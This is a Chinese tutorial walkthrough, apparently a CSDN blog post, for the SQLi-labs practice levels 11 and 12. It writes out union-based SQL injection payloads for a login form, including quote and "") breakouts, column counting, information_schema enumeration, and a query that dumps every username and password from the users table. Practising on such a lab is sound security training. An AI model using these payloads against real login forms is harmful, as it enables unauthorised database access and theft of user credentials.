目录
第十一、十二关
1、在账号密码输入admin,查看成功效果。
2、输入错误的账号密码,查看错误效果。
3、找注入点,我们尝试在账户的输入框中加单引号,发现出现报错。
4、加注释,查看页面是否恢复正常,可以看到页面成功执行了,证明当前网址存在单引号注入问题。
5、判断字段数
6、找寻字段回显位置
7、查询所有数据库的名称
8、查询当前数据库的名称
9、查询security数据库下的所有数据
10、查询security数据库中users数据表中的所有字段
11、查询users数据表中username字段和password字段下的内容
12、显示字段中单个内容
第十二关
1、找寻注入点
2、根据报错的信息,我们发现它是由")的闭合方式,我们加注释查看页面是否成功执行。
3、接下来的步骤就跟11关一样,只是单引号变成了")
第十一、十二关
三个页面:成功页面、错误页面、报错页面
1、在账号密码输入admin,查看成功效果。
![](https://img-blog.csdnimg.cn/img_convert/10d259a90a1f8457c7ed229b5b448a95.png)
2、输入错误的账号密码,查看错误效果。
![](https://img-blog.csdnimg.cn/img_convert/45785a523e5f3eff7f92382a46235572.png)
3、找注入点,我们尝试在账户的输入框中加单引号,发现出现报错。
![](https://img-blog.csdnimg.cn/img_convert/003bf781db679f50c45652b8d0104f70.png)
4、加注释,查看页面是否恢复正常,可以看到页面成功执行了,证明当前网址存在单引号注入问题。
admin' -- +
![](https://img-blog.csdnimg.cn/img_convert/4c0ee662fc19cfb4aad1e421ff657b43.png)
5、判断字段数
admin' and 1=2 order by 3 -- +
admin' and 1=2 order by 2 -- +
![](https://img-blog.csdnimg.cn/img_convert/c00cc7e15910e21a12e92658c8d89f50.png)
通过以上信息我们可以知道它的字段数为2
6、找寻字段回显位置
admin' and 1=2 union select 1,2 -- +
![](https://img-blog.csdnimg.cn/img_convert/428b78de5b7dd90caa1d33a8dda06bde.png)
7、查询所有数据库的名称
admin' and 1=2 union select 1,binary(group_concat(schema_name)) from information_schema.schemata -- +
![](https://img-blog.csdnimg.cn/img_convert/d3e812546d267bf5cb91dafbd97613a8.png)
8、查询当前数据库的名称
admin' and 1=2 union select 1,database() -- +
![](https://img-blog.csdnimg.cn/img_convert/3a77cf3e104df744af1323389787f981.png)
9、查询security数据库下的所有数据
admin' and 1=2 union select 1,binary(group_concat(table_name)) from information_schema.tables where table_schema="security" -- +
![](https://img-blog.csdnimg.cn/img_convert/c8bc779da9bedbab4fcb7b3cd5d97f05.png)
10、查询security数据库中users数据表中的所有字段
admin' and 1=2 union select 1,binary(group_concat(column_name)) from information_schema.columns where table_schema='security' and table_name='users' -- +
![](https://img-blog.csdnimg.cn/img_convert/802c654d3f2813958ab77f35436605be.png)
11、查询users数据表中username字段和password字段下的内容
admin' and 1=2 union select binary(group_concat(username)),binary(group_concat(password)) from users -- +
![](https://img-blog.csdnimg.cn/img_convert/e25d58fc3613be584611d91f98d28450.png)
12、显示字段中单个内容
如果要查看下一个就 limit 1,1
limit 0,1 从第0位开始往后1位的内容(不包括0)
admin' and 1=2 union select username,password from users limit 0,1 -- +
![](https://img-blog.csdnimg.cn/img_convert/0c74a4592f26a75bf7695f4da7a596a4.png)
到此闯关完成,闯关结束。
第十二关
1、找寻注入点
在Username后的文本框中输入admin'发现没有报错,当我们输入双引号的时候发现提示报错
![](https://img-blog.csdnimg.cn/img_convert/d00581210644b0e4074f96e59b8b9b08.png)
2、根据报错的信息,我们发现它是由")的闭合方式,我们加注释查看页面是否成功执行。
admin") -- +
![](https://img-blog.csdnimg.cn/img_convert/9344f53d1b02ef0fbcb47b2011feffbe.png)
3、接下来的步骤就跟11关一样,只是单引号变成了")
到此闯关完成,闯关结束。